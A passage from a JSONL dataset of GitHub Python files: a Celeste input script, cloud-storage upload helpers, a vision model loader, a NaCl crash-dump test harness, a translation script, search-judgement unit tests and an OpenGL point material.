plt.clf()\n\nwant_to_jump = False\n\ndef update(data, debug_print):\n    # BASIC INFORMATION\n    # Print the data we're given. DON'T EVER USE PRINT().\n    # We can see a copy of the statements from debug_print in your Celeste Directory/code_log.txt\n    debug_print(data)\n    # If you want some delay to read console information:\n    #time.sleep(0.01)\n\n    # We access our global variables from the scope:\n    global level_name\n    global want_to_jump\n\n    if data[\"levelData\"][\"name\"] != level_name:\n        debug_print(level_name)\n        debug_print(\"Wow! New level!\")\n        level_name = data[\"levelData\"][\"name\"]\n        new_level(data, debug_print)\n    \n    # You'll notice adding R (right) to the inputs will cause the player to move right.\n    # Adding U (Up) to the inputs, however, results in no changes, because divisions.ini doesn't allow code in the head folder to use up.\n    return_str = \"RU\"\n\n    # You'll notice that if we print something, it won't show up anywhere or influence the game (so use debug_print!):\n    print(\"I AM JUMPING JUMPING JUMPING WHEEEE X\")\n\n    # We need to reset jumping every time we die (try holding down the jump button in celeste, dying, and then keep holding jump. Nothing will happen.)\n    # Time resets after death, and so we wait to apply inputs until after we've respawned.\n    if data[\"player\"][\"currentState\"] != \"Player.StIntroRespawn\" and (data[\"player\"][\"onGround\"] or data[\"player\"][\"jumpTimer\"] > 0):\n        return_str += \"J\"\n        # If we wanted to jump from the last frame, but that's not happening because there is no jump timer (because the player just died or something), we need to temporarily release the jump button:\n        if want_to_jump and data[\"player\"][\"jumpTimer\"] <= 0:\n            return_str = \"RU\"\n            want_to_jump = False\n        else:\n            want_to_jump = True\n    # Continually go to the right (and jump if we can):\n    return return_str","repo_name":"GDACollab/ProgrammingPlaysCeleste","sub_path":"code/head/samplescript.py","file_name":"samplescript.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"3922317716","text":"from google.cloud import storage\nimport os\nfrom random import choice\nfrom datetime import datetime\nimport dropbox\nfrom pydub import AudioSegment\nimport pandas as pd\nfrom dotenv import load_dotenv\n\n\"Handles all downloads / uploads to GCP Storage and Dropbox\"\n\n# Loads all .env variables\nload_dotenv()\n\n# env variables for G-Cloud functions\nGCP_API_KEY = os.getenv('GCP_API_KEY')\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = GCP_API_KEY\nconfig = {\n    \"language_code\": \"en-US\",\n    \"enable_word_time_offsets\": True,\n    \"enable_automatic_punctuation\": True\n}\n\n# General DB Update\n\n\ndef db_update(info_dict, path=\"Data/AutoRedditDB.csv\"):\n    \"\"\"Accesses the previous database and appends new info from scrapes\n\ninfo_dict:\n    dict of info from the desired scrape\npath:\n    path to the current database\"\"\"\n\n    # Build the new row first so it can still be saved if reading the database fails\n    appendable = pd.DataFrame(info_dict, index=[0])\n\n    try:\n        old_df = pd.read_csv(path, index_col=0)\n        new_df = pd.concat([old_df, appendable], ignore_index=True)\n        new_df.to_csv(path, mode='w')\n        print(\"\\nData appended to local database successfully.\\n\")\n\n    except Exception:\n        appendable.to_csv(f\"{info_dict['Id']}_info_dict.csv\")\n        print(\"\\nIncomplete information, please review appendable.\\n\")\n\n    try:\n        storage_client = storage.Client()\n        bucket = storage_client.get_bucket('autoreddit-database')\n        blob = bucket.get_blob(\"AutoRedditDB.csv\")\n        
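# Overwrite the remote CSV so the GCP bucket copy tracks the local database.\n        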
blob.upload_from_filename(path)\n        print(\"\\nDatabase uploaded to GCP successfully.\\n\")\n\n    except Exception as e:\n        print(f\"\\nData has not been uploaded to GCP due to exception: {e} \\n\")\n\n    return True\n\n# Uploads t2s audio to GCP for s2t analyzer\n\n\ndef upload_audio(audiopath, info_dict):\n    \"\"\"Uploads the final audio file from t2s into GCP for analysis by s2t\n\naudiopath:\n    path to final audio on local disk\ninfo_dict:\n    dictionary returned by csv2dict function\n\nReturns:\n    uri: uri to GCP audio file\n    duration: duration of audio in seconds (float format)\"\"\"\n\n    print(\"\\nUploading audio file to GCP storage.\\n\")\n    duration = AudioSegment.from_file(audiopath).duration_seconds\n    post_id = info_dict['Id']\n    storage_client = storage.Client()\n    bucket = storage_client.get_bucket('audio_for_s2t')\n    blob = bucket.blob(f\"{post_id}_t2s.wav\")\n    blob.upload_from_filename(audiopath, num_retries=3)\n\n    uri = dict(uri=f\"gs://audio_for_s2t/{post_id}_t2s.wav\")\n\n    print(\n        f\"\\nAudio uploaded to storage.\\n\\n\\nDuration of audio is {duration}s.\\n\")\n    return (uri, duration)\n\n# Downloads bg video / audio from gcs\n\n\ndef gcs_video_downloader(downloads_path, duration, name):\n    \"\"\"Pulls a random bg_video from the desired bucket\n\ndownloads_path:\n    path to downloads folder\nduration:\n    time of current audio\nname:\n    creator name; selects which bg_videos subfolder to draw from\n\nReturns: path to the downloaded video to be sent to CCR\n\"\"\"\n    if name == \"ari\":\n        prefix = \"ari_bg_videos/\"\n    elif name == \"alex\":\n        prefix = \"alex_bg_videos/\"\n\n    # Note: Client.list_blobs requires at least package version 1.17.0.\n    storage_client = storage.Client()\n    bucket = storage_client.get_bucket('bg_videos')\n    blobs = bucket.list_blobs(prefix=prefix)\n\n    print(\"\\nChoosing video to download.\\n\")\n    # Note: The call returns a response only when the iterator is consumed.\n    blob_list = [x.name for x in blobs]\n    blob_names = [x.split(\"/\")[-1]\n                  for x in blob_list if x.split(\"/\")[-1] != '']\n    folder_name = blob_list[0]\n    # Video file names start with a length bucket (1, 3, or 6) matched to the audio duration\n    video_time = 0\n    if float(duration) > 180:\n        video_time = 6\n    elif float(duration) > 60:\n        video_time = 3\n    else:\n        video_time = 1\n    filter_lst = [x for x in blob_names if x[0] == str(video_time) and x != '']\n    video = choice(filter_lst)\n    uri = f\"gs://{bucket.name}/{folder_name}{video}\"\n    output_path = os.path.join(\n        downloads_path, f\"{datetime.today().date()}-bgvideo.webm\")\n\n    print(\"\\nDownloading chosen video from GCP.\\n\")\n    with open(output_path, 'wb') as f:\n        storage_client.download_blob_to_file(blob_or_uri=uri, file_obj=f)\n\n    storage_client.close()  # Closes client\n\n    print(\"\\nVideo downloaded.\\n\")\n    return output_path\n\n# Uploading files to GCS\n\n\ndef upload_to_gcs(final_renders_path, info_dict):\n    \"\"\"Uploads final cuts to GCS storage\n\nfinal_renders_path:\n    path to final renders folder\ninfo_dict:\n    dictionary returned from csv2dict function\n\nReturns:\n    name for the GCP folder that the finals are saved under\"\"\"\n\n    # Downloads the directory or files after -r to the bucket after gs://\n    # os.system(f'gsutil cp -r {final_renders_path} gs://finals_for_upload')\n    post_id = info_dict[\"Id\"]\n\n    os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = \"Data/autoreddit-377319-e4460975370b.json\"\n    storage_client = storage.Client()\n    print(\"\\nBeginning upload of final cuts to GCP.\\n\")\n\n    # Upload final video files\n    bucket = storage_client.get_bucket('finals_for_upload')\n    today = datetime.today()\n    
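# Stamp the GCP folder name with the upload date, time, and post id so repeated uploads get distinct folders.\n    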
date_of_upload = today.date()\n    time_of_upload = str(today.time())[:5]\n    folder = f\"{date_of_upload}_{time_of_upload}_{post_id}\"\n    files = os.listdir(final_renders_path)\n    for file in files:\n        path = os.path.join(os.getcwd(), final_renders_path, file)\n        blob = bucket.blob(f\"{folder}/{file}\")\n        blob.upload_from_filename(path)\n\n    storage_client.close()\n\n    print(\"\\nFinal cuts upload to GCP complete.\\n\")\n    return folder\n\n# Uploading to dropbox\n\n\ndef dropbox_upload(final_renders_path, info_dict, name):\n    \"\"\"Uploads final cuts to Dropbox cloud storage\n\nfinal_renders_path:\n    path to final renders folder\ninfo_dict:\n    dictionary returned from csv2dict function\"\"\"\n\n    post_id = info_dict['Id']\n\n    # Create a Dropbox client\n    dropbox_key = os.getenv('DROPBOX_KEY')\n    dropbox_secret = os.getenv('DROPBOX_SECRET')\n    dropbox_oauth_refresh = os.getenv('DROPBOX_OAUTH_REFRESH')\n    dbx = dropbox.Dropbox(app_key=dropbox_key,\n                          app_secret=dropbox_secret,\n                          oauth2_refresh_token=dropbox_oauth_refresh)\n\n    # Define the path of the new folder to create\n    new_folder_path = f\"/{name}_{datetime.now().date()}_{post_id}\"\n\n    # Create the new folder\n    try:\n        dbx.files_create_folder(new_folder_path)\n        print(\n            f\"\\nNew Dropbox folder '{new_folder_path}' created successfully!\\n\")\n    except dropbox.exceptions.ApiError as e:\n        print(\"\\nError creating new folder:\", e)\n\n    # Upload every final render into the new folder\n    try:\n        finals = os.listdir(final_renders_path)\n        for x in finals:\n            file = os.path.join(final_renders_path, x)\n\n            # Open the video file and read its contents\n            with open(file, \"rb\") as f:\n                file_contents = f.read()\n\n            # Define the path of the new video file in Dropbox\n            new_video_file_path = new_folder_path + f\"/{x}\"\n\n            # Upload the video file to Dropbox\n            dbx.files_upload(file_contents, new_video_file_path)\n            print(f\"Video file {x} uploaded successfully!\")\n\n    except dropbox.exceptions.ApiError as e:\n        print(\"\\nError uploading video file:\", e)\n\n    print(\"\\nFinal cuts upload to Dropbox complete.\\n\")\n    return True\n","repo_name":"garrettfazzino/AutoReddit_v.2.0.1","sub_path":"Processes/CloudStorage.py","file_name":"CloudStorage.py","file_ext":"py","file_size_in_byte":7322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"28268558329","text":"import torch\n\nfrom CLAPPVision.vision.models import FullModel, ClassificationModel\nfrom CLAPPVision.utils import model_utils\n\n\ndef load_model_and_optimizer(opt, num_GPU=None, reload_model=False, calc_loss=True):\n\n    model = FullModel.FullVisionModel(\n        opt, calc_loss\n    )\n\n    optimizer = []\n    if opt.model_splits == 1:\n        optimizer.append(torch.optim.Adam(model.parameters(), lr=opt.learning_rate, weight_decay=opt.weight_decay))\n    elif opt.model_splits >= 2:\n        # use separate optimizer for each module, so gradients don't get mixed up\n        for idx, layer in enumerate(model.encoder):\n            optimizer.append(torch.optim.Adam(layer.parameters(), lr=opt.learning_rate, weight_decay=opt.weight_decay))\n    else:\n        raise NotImplementedError\n    # Note: module.parameters() acts recursively by default and adds all parameters of submodules as well\n\n    model, num_GPU = model_utils.distribute_over_GPUs(opt, model, num_GPU=num_GPU)\n\n    model, optimizer = model_utils.reload_weights(\n        opt, model, optimizer, reload_model=reload_model\n    )\n\n    return model, optimizer\n\ndef load_classification_model(opt):\n    if opt.in_channels is None:\n        in_channels = 1024\n    else:\n        in_channels = 
opt.in_channels\n\n if opt.dataset == \"stl10\" or opt.dataset == \"cifar10\":\n num_classes = 10\n elif opt.dataset == \"cifar100\":\n num_classes = 100\n else:\n raise Exception(\"Invalid option\")\n\n classification_model = ClassificationModel.ClassificationModel(\n in_channels=in_channels, num_classes=num_classes,\n ).to(opt.device)\n\n return classification_model\n","repo_name":"EPFL-LCN/pub-illing2021-neurips","sub_path":"vision/CLAPPVision/vision/models/load_vision_model.py","file_name":"load_vision_model.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"72"} +{"seq_id":"28127223037","text":"import os\nimport subprocess\nimport sys\nimport tempfile\nimport time\n\nscript_dir = os.path.dirname(__file__)\nsys.path.append(os.path.join(script_dir,\n '../../tools/browser_tester'))\n\nimport browser_tester\nimport browsertester.browserlauncher\n\n# This script extends browser_tester to check for the presence of\n# Breakpad crash dumps.\n\n\n# This reads a file of lines containing 'key:value' pairs.\n# The file contains entries like the following:\n# plat:Win32\n# prod:Chromium\n# ptype:nacl-loader\n# rept:crash svc\ndef ReadDumpTxtFile(filename):\n dump_info = {}\n fh = open(filename, 'r')\n for line in fh:\n if ':' in line:\n key, value = line.rstrip().split(':', 1)\n dump_info[key] = value\n fh.close()\n return dump_info\n\n\ndef StartCrashService(browser_path, dumps_dir, windows_pipe_name,\n cleanup_funcs, crash_service_exe):\n # Find crash_service.exe relative to chrome.exe. This is a bit icky.\n browser_dir = os.path.dirname(browser_path)\n proc = subprocess.Popen([os.path.join(browser_dir, crash_service_exe),\n '--dumps-dir=%s' % dumps_dir,\n '--pipe-name=%s' % windows_pipe_name])\n\n def Cleanup():\n # Note that if the process has already exited, this will raise\n # an 'Access is denied' WindowsError exception, but\n # crash_service.exe is not supposed to do this and such\n # behaviour should make the test fail.\n proc.terminate()\n status = proc.wait()\n sys.stdout.write('crash_dump_tester: %s exited with status %s\\n'\n % (crash_service_exe, status))\n\n cleanup_funcs.append(Cleanup)\n\n\ndef GetDumpFiles(dumps_dir):\n all_files = [os.path.join(dumps_dir, dump_file)\n for dump_file in os.listdir(dumps_dir)]\n sys.stdout.write('crash_dump_tester: Found %i files\\n' % len(all_files))\n for dump_file in all_files:\n sys.stdout.write(' %s\\n' % dump_file)\n return [dump_file for dump_file in all_files\n if dump_file.endswith('.dmp')]\n\n\ndef Main(cleanup_funcs):\n parser = browser_tester.BuildArgParser()\n parser.add_option('--expected_crash_dumps', dest='expected_crash_dumps',\n type=int, default=0,\n help='The number of crash dumps that we should expect')\n parser.add_option('--expected_process_type_for_crash',\n dest='expected_process_type_for_crash',\n type=str, default='nacl-loader',\n help='The type of Chromium process that we expect the '\n 'crash dump to be for')\n # Ideally we would just query the OS here to find out whether we are\n # running x86-32 or x86-64 Windows, but Python's win32api module\n # does not contain a wrapper for GetNativeSystemInfo(), which is\n # what NaCl uses to check this, or for IsWow64Process(), which is\n # what Chromium uses. 
Instead, we just rely on the build system to\n # tell us.\n parser.add_option('--win64', dest='win64', action='store_true',\n help='Pass this if we are running tests for x86-64 Windows')\n options, args = parser.parse_args()\n\n dumps_dir = tempfile.mkdtemp(prefix='nacl_crash_dump_tester_')\n def CleanUpDumpsDir():\n browsertester.browserlauncher.RemoveDirectory(dumps_dir)\n cleanup_funcs.append(CleanUpDumpsDir)\n\n # To get a guaranteed unique pipe name, use the base name of the\n # directory we just created.\n windows_pipe_name = r'\\\\.\\pipe\\%s_crash_service' % os.path.basename(dumps_dir)\n\n # This environment variable enables Breakpad crash dumping in\n # non-official builds of Chromium.\n os.environ['CHROME_HEADLESS'] = '1'\n if sys.platform == 'win32':\n # Override the default (global) Windows pipe name that Chromium will\n # use for out-of-process crash reporting.\n os.environ['CHROME_BREAKPAD_PIPE_NAME'] = windows_pipe_name\n # Launch the x86-32 crash service so that we can handle crashes in\n # the browser process.\n StartCrashService(options.browser_path, dumps_dir, windows_pipe_name,\n cleanup_funcs, 'crash_service.exe')\n if options.win64:\n # Launch the x86-64 crash service so that we can handle crashes\n # in the NaCl loader process (nacl64.exe).\n StartCrashService(options.browser_path, dumps_dir, windows_pipe_name,\n cleanup_funcs, 'crash_service64.exe')\n # We add a delay because there is probably a race condition:\n # crash_service.exe might not have finished doing\n # CreateNamedPipe() before NaCl does a crash dump and tries to\n # connect to that pipe.\n # TODO(mseaborn): We could change crash_service.exe to report when\n # it has successfully created the named pipe.\n time.sleep(1)\n elif sys.platform == 'darwin':\n os.environ['BREAKPAD_DUMP_LOCATION'] = dumps_dir\n\n result = browser_tester.Run(options.url, options)\n\n dmp_files = GetDumpFiles(dumps_dir)\n failed = False\n msg = ('crash_dump_tester: ERROR: Got %i crash dumps but expected %i\\n' %\n (len(dmp_files), options.expected_crash_dumps))\n if len(dmp_files) != options.expected_crash_dumps:\n sys.stdout.write(msg)\n failed = True\n # On Windows, the crash dumps should come in pairs of a .dmp and\n # .txt file.\n if sys.platform == 'win32':\n for dump_file in dmp_files:\n second_file = dump_file[:-4] + '.txt'\n msg = ('crash_dump_tester: ERROR: File %r is missing a corresponding '\n '%r file\\n' % (dump_file, second_file))\n if not os.path.exists(second_file):\n sys.stdout.write(msg)\n # TODO(mseaborn): Investigate and remove this workaround.\n if (options.expected_process_type_for_crash == 'browser' and\n sys.platform == 'win32'):\n sys.stdout.write('crash_dump_tester: Ignoring this error on Windows '\n 'because the .txt file is sometimes missing -- '\n 'see http://crbug.com/169394\\n')\n continue\n failed = True\n continue\n # Check that the crash dump comes from the NaCl process.\n dump_info = ReadDumpTxtFile(second_file)\n if 'ptype' in dump_info:\n msg = ('crash_dump_tester: ERROR: Unexpected ptype value: %r != %r\\n'\n % (dump_info['ptype'], options.expected_process_type_for_crash))\n if dump_info['ptype'] != options.expected_process_type_for_crash:\n sys.stdout.write(msg)\n failed = True\n else:\n sys.stdout.write('crash_dump_tester: ERROR: Missing ptype field\\n')\n failed = True\n # TODO(mseaborn): Ideally we would also check that a backtrace\n # containing an expected function name can be extracted from the\n # crash dump.\n\n if failed:\n sys.stdout.write('crash_dump_tester: FAILED\\n')\n result = 
1\n else:\n sys.stdout.write('crash_dump_tester: PASSED\\n')\n\n return result\n\n\ndef MainWrapper():\n cleanup_funcs = []\n try:\n return Main(cleanup_funcs)\n finally:\n for func in cleanup_funcs:\n func()\n\n\nif __name__ == '__main__':\n sys.exit(MainWrapper())\n","repo_name":"Netflix/NfWebCrypto","sub_path":"plugin/ppapi/ppapi/native_client/tests/breakpad_crash_test/crash_dump_tester.py","file_name":"crash_dump_tester.py","file_ext":"py","file_size_in_byte":7001,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"72"} +{"seq_id":"42567062340","text":"import json\n\nfrom nltk import tokenize\nfrom tqdm import tqdm\nfrom transformers import pipeline\n\n\ndef translate_sentence(sentence, translator):\n if len(translator.tokenizer.tokenize(sentence)) < 256:\n return translator(sentence, max_length=256)[0]['translation_text']\n else:\n return \"\"\n\n\ndef translate_paragraph(paragraph, translator):\n sentences = tokenize.sent_tokenize(paragraph)\n result = ' '.join([translate_sentence(sentence, translator)\n for sentence in sentences])\n if not result:\n print(\"WARNING: there may be empty paragraphs after translation\")\n return result\n\n\ndef translate_paragraphs(paragraphs, indices, translator):\n translated = []\n progress = tqdm(total=len(indices))\n for i in indices:\n translated.append(\n {'paragraph': translate_paragraph(paragraphs[i]['translation']['in'], translator),\n 'language': 'indonesian'})\n progress.update(1)\n return translated\n\n\nif __name__ == '__main__':\n model_checkpoint = \"Helsinki-NLP/opus-mt-id-en\"\n translator = pipeline(\"translation\", model=model_checkpoint, device=0)\n paragraphs = []\n with open('data/original/indonesian/for_monolingual.jsonl') as f:\n for line in f:\n paragraphs.append(json.loads(line))\n\n test_paragraphs = translate_paragraphs(paragraphs, range(1600, 1950), translator)\n test_json = json.dumps(test_paragraphs, indent=4)\n with open(\"data/translated/from_indonesian/test_helsinki.json\", \"w\") as file:\n file.write(test_json)\n\n train_paragraphs = translate_paragraphs(paragraphs, range(1600), translator)\n train_json = json.dumps(train_paragraphs, indent=4)\n with open(\"data/translated/from_indonesian/train_helsinki.json\", \"w\") as file:\n file.write(train_json)\n\n\n","repo_name":"whitejeep600/translation_language_detection","sub_path":"scripts/helsinki_translate.py","file_name":"helsinki_translate.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"52967919","text":"# coding=utf-8\nimport json\nfrom mock import MagicMock\nimport yt.wrapper as yt\nimport pytest\n\nimport judgements\nfrom test_utils import create_serp, create_component\nfrom enrichments import SINSIG_ENRICHMENT, IMAGES_RELEVANCE_ENRICHMENT, RELEVANCE_ENRICHMENT\n\n\nQUERY = {\n 'text': 'test',\n 'country': 'RU',\n 'device': 'DESKTOP',\n 'region': {'id': 1}\n}\n\nCOMPONENT = create_component(url='http://test')\nIMAGES_QUERY = {\n 'text': 'test',\n 'country': 'RU',\n 'device': 'DESKTOP',\n 'region': {'id': 1},\n \"params\": [\n {\n 'name': 'query_date',\n 'value': 'testdate'\n },\n {\n 'name': 'queryfresh',\n 'value': 'testfresh'\n }\n ]\n}\nIMAGES_COMPONENT = {\n 'url.imageBigThumbHref': 'http://test',\n 'url.mimcaMdsUrl': 'http://mimcaurl',\n 'long.MIMCA_CRC64': 1,\n 'dimension.MIMCA_IMAGE_DIMENSION': {'w': 1, 'h': 2},\n 'componentUrl': {'pageUrl': 'http://pageurl'}\n}\n\nJI = {\n 'query': 'test',\n 'region_id': 
1,\n 'country': 'RU',\n 'device': 'DESKTOP',\n 'url': 'http://test'\n}\nIMAGE_JI = {\n 'query': 'test',\n 'region_id': 1,\n 'country': 'RU',\n 'device': 'DESKTOP',\n 'image_url': 'test/'\n}\n\nIMAGE_HITMAN_JI = {\n 'NULLABLE.COMPONENT.url.mimcaMdsUrl': \"http://mimcaurl\",\n \"NULLABLE.COMPONENT.long.MIMCA_CRC64\": 1,\n 'component_page_url': \"http://pageurl\",\n \"query_text\": \"test\",\n \"query_region_id\": 1,\n \"component_image_url\": \"http://test\",\n \"query_country\": \"RU\",\n \"NULLABLE.COMPONENT.dimension.IMAGE_DIMENSION\": {\n \"h\": 2,\n \"w\": 1\n },\n \"query_device\": \"DESKTOP\",\n \"component_mimca_image_url\": \"http://test\",\n \"NULLABLE.SERP.serp_query_param.query_date\": \"testdate\",\n \"NULLABLE.SERP.serp_query_param.queryfresh\": \"testfresh\"\n}\nRELEVANCE_ASSESSMENT = {'relevance': 'RELEVANT_PLUS'}\n\n\ndef check_relevance(component):\n return component[judgements.RELEVANCE_SCALE]['name'] == \"RELEVANT_PLUS\"\n\n\ndef check_images_relevance(component):\n return component[judgements.IMAGES_RELEVANCE_SCALE]['name'] == \"RELEVANT_PLUS\"\n\n\nSINSIG_TAG = \"web_world_validate.201810\"\n\n\nSINSIG_QUERY = {\n \"text\": \"кто польжунтся маслом с проблемной кожи\",\n \"country\": \"BY\",\n \"device\": \"IPHONE\",\n \"region\": {\"id\": 157},\n \"params\": [\n {\n \"name\": \"query_group_tag\",\n \"value\": SINSIG_TAG\n }\n ]\n}\nSINSIG_COMPONENT = create_component(url=\"https://irecommend.ru/content/eto-voobshche-zakonno-ispolzovat-maslo-dlya-zhirnoi-problemnoi-kozhi-istoriya-o-tom-kak-ya-n\")\nSINSIG_JI = {\n \"qurl_id\": \"ceb88c18d54c7324565726eafc4edef02fbd8f5efaf2419bdf111b48\"\n}\nSINSIG_ASSESSMENT = {\n \"slider_values\": [\n -1.0,\n -1.0,\n 30.143064852500000228\n ],\n \"judgement_values\": [\n \"RELEVANCE_MINUS_GOOD\",\n \"RELEVANCE_MINUS_GOOD\",\n \"SLIDER_GRADE\"\n ],\n \"spec_scores\": [\n 2.619474618599999971,\n 5.2019770203000001985,\n 1.1131916373999999337\n ]\n}\n\n\ndef check_sinsig(component):\n v1 = json.loads(component[judgements.JUDGEMENTS_SINSIG_JUDGEMENT_VALUES][\"name\"]) == SINSIG_ASSESSMENT[\"judgement_values\"]\n v2 = json.loads(component[judgements.JUDGEMENTS_SINSIG_SLIDER_VALUES][\"name\"]) == SINSIG_ASSESSMENT[\"slider_values\"]\n v3 = json.loads(component[judgements.JUDGEMENTS_SINSIG_SPEC_SCORES][\"name\"]) == SINSIG_ASSESSMENT[\"spec_scores\"]\n return v1 and v2 and v3\n\nENRICHMENT = RELEVANCE_ENRICHMENT\nIMAGES_ENRICHMENT = IMAGES_RELEVANCE_ENRICHMENT\n\n\ndef test_add_judgements_empty():\n yt.lookup_rows = MagicMock()\n\n ENRICHMENT.add_judgements([])\n\n yt.lookup_rows.assert_not_called()\n\n\ndef test_skip_not_valid_components():\n yt.lookup_rows = MagicMock()\n\n ENRICHMENT.add_judgements([create_serp([{}], query=QUERY)])\n\n yt.lookup_rows.assert_not_called()\n\n\ndef test_add_missing_judgements():\n hash = ENRICHMENT.get_hash(JI, lambda x: x)\n judgement = {'hash': hash, 'assessment_result': {}}\n yt.lookup_rows = MagicMock(return_value=[judgement])\n serp = create_serp(query=QUERY, components=[COMPONENT.copy()])\n\n ENRICHMENT.add_judgements([serp])\n\n assert judgements.RELEVANCE_SCALE not in serp.components[0]\n\n\ndef test_looks_like_judgement():\n assert judgements.looks_like_judgement({judgements.HIT_TYPE_FIELD: 'test_hit_type'})\n\n\ndef test_dont_looks_like_judgement():\n assert not judgements.looks_like_judgement({'k': 'v'})\n\n\ndef test_get_ji():\n assert ENRICHMENT.get_ji(QUERY, COMPONENT) == JI\n\n\ndef test_get_ji_no_url():\n assert ENRICHMENT.get_ji(QUERY, {}) is None\n\n\ndef test_get_ji_no_query():\n assert 
ENRICHMENT.get_ji({}, COMPONENT) is None\n\n\ndef test_get_hitman_ji():\n assert ENRICHMENT.get_hitman_ji(QUERY, COMPONENT) ==\\\n {\n 'query_text': 'test',\n 'query_region_id': 1,\n 'query_country': 'RU',\n 'query_device': 'DESKTOP',\n 'component_page_url_or_site_link_url': 'http://test',\n 'NULLABLE.SERP.query_param.navmx_tmp': None\n }\n\n\ndef test_get_hitman_ji_navmx():\n query = QUERY.copy()\n query['params'] = [{'name': 'navmx_tmp', 'value': '0.5'}]\n assert ENRICHMENT.get_hitman_ji(query, COMPONENT) ==\\\n {\n 'query_text': 'test',\n 'query_region_id': 1,\n 'query_country': 'RU',\n 'query_device': 'DESKTOP',\n 'component_page_url_or_site_link_url': 'http://test',\n 'NULLABLE.SERP.query_param.navmx_tmp': 0.5\n }\n\n\ndef test_get_hitman_ji_no_url():\n assert ENRICHMENT.get_hitman_ji(QUERY, {}) is None\n\n\ndef test_get_hitman_ji_no_query():\n assert ENRICHMENT.get_hitman_ji({}, COMPONENT) is None\n\n\ndef test_get_hitman_ji_sinsig():\n assert SINSIG_ENRICHMENT.get_hitman_ji(SINSIG_QUERY, SINSIG_COMPONENT) == {\n 'query_text': SINSIG_QUERY['text'],\n 'query_region_id': SINSIG_QUERY['region']['id'],\n 'query_country': SINSIG_QUERY['country'],\n 'query_device': SINSIG_QUERY['device'],\n 'component_page_url': SINSIG_COMPONENT['componentUrl']['pageUrl'],\n 'SERP.query_param.query_group_tag': SINSIG_TAG\n }\n\n\ndef test_get_hitman_ji_images():\n assert IMAGES_ENRICHMENT.get_hitman_ji(IMAGES_QUERY, IMAGES_COMPONENT) == IMAGE_HITMAN_JI\n\n\ndef test_get_image_url_empty():\n assert judgements.get_image_url({}) is None\n\n\ndef test_get_image_url_big_thumb():\n assert judgements.get_image_url(IMAGES_COMPONENT) == 'http://test'\n\n\ndef test_get_image_url_candidates():\n assert judgements.get_image_url({'imageadd': {'candidates': ['url']}}) == 'url'\n\n\ndef test_images_get_ji():\n assert IMAGES_ENRICHMENT.get_ji(QUERY, IMAGES_COMPONENT) == IMAGE_JI\n\n\n@pytest.mark.parametrize('enrichment, ji, component, check', [\n (ENRICHMENT, JI, COMPONENT, check_relevance),\n (IMAGES_ENRICHMENT, IMAGE_JI, IMAGES_COMPONENT, check_images_relevance)\n])\ndef test_add_judgements(enrichment, ji, component, check):\n hash = enrichment.get_hash(ji, lambda x: x)\n judgement = {'hash': hash, 'assessment_result': RELEVANCE_ASSESSMENT}\n yt.lookup_rows = MagicMock(return_value=[judgement])\n serp = create_serp(query=QUERY, components=[component.copy()])\n\n enrichment.add_judgements([serp])\n\n assert check(serp.components[0])\n\n\n@pytest.mark.parametrize('enrichment, ji, assessment, query, component, check', [\n (ENRICHMENT, JI, RELEVANCE_ASSESSMENT, QUERY, COMPONENT, check_relevance),\n (IMAGES_ENRICHMENT, IMAGE_JI, RELEVANCE_ASSESSMENT, QUERY, IMAGES_COMPONENT, check_images_relevance),\n (SINSIG_ENRICHMENT, SINSIG_JI, SINSIG_ASSESSMENT, SINSIG_QUERY, SINSIG_COMPONENT, check_sinsig)\n])\ndef test_add_judgements_for_two_same_serps(enrichment, ji, assessment, query, component, check):\n hash = enrichment.get_hash(ji, lambda x: x)\n judgement = {'hash': hash, 'assessment_result': assessment}\n yt.lookup_rows = MagicMock(return_value=[judgement])\n serp = create_serp(query=query, components=[component.copy()])\n serp_copy = create_serp(query=query, components=[component.copy()])\n\n enrichment.add_judgements([serp, serp_copy])\n\n assert check(serp.components[0])\n assert check(serp_copy.components[0])\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"Search 
engine/tests/judgements_test.py","file_name":"judgements_test.py","file_ext":"py","file_size_in_byte":8175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35098842235","text":"import OpenGL.GL as GL\n\nfrom py3d.material.basic import BasicMaterial\n\n\nclass PointMaterial(BasicMaterial):\n def __init__(self, vertex_shader_code=None, fragment_shader_code=None, property_dict=None, use_vertex_colors=True):\n super().__init__(vertex_shader_code, fragment_shader_code, use_vertex_colors)\n # Render vertices as points\n self._setting_dict[\"drawStyle\"] = GL.GL_POINTS\n # Set the width and height of points, in pixels\n self._setting_dict[\"pointSize\"] = 8\n # Draw points as rounded\n self._setting_dict[\"roundedPoints\"] = False\n self.set_properties(property_dict)\n\n def update_render_settings(self):\n GL.glPointSize(self._setting_dict[\"pointSize\"])\n if self._setting_dict[\"roundedPoints\"]:\n GL.glEnable(GL.GL_POINT_SMOOTH)\n else:\n GL.glDisable(GL.GL_POINT_SMOOTH)\n","repo_name":"ax-va/PyOpenGL-Pygame-Stemkoski-Pascale-2021","sub_path":"py3d/material/point.py","file_name":"point.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"12053574392","text":"import re\nimport shutil\nimport os\nimport sqlite3\nfrom sqlite3 import Error\n\nsql_path = '' # ex) /Users/abc/Library/Caches/Adobe/Bridge/Cache/v36/data/store\ndb_parent_path = \"\" # ex)bridge:fs:file:///Users/abc/Desktop/230110\ntarget_folder = \"\" # ex) /Users/abc/Desktop/230110\n\n\ndef createFolder(directory):\n try:\n if not os.path.exists(directory):\n os.makedirs(directory)\n except OSError:\n print('Error: Creating directory. 
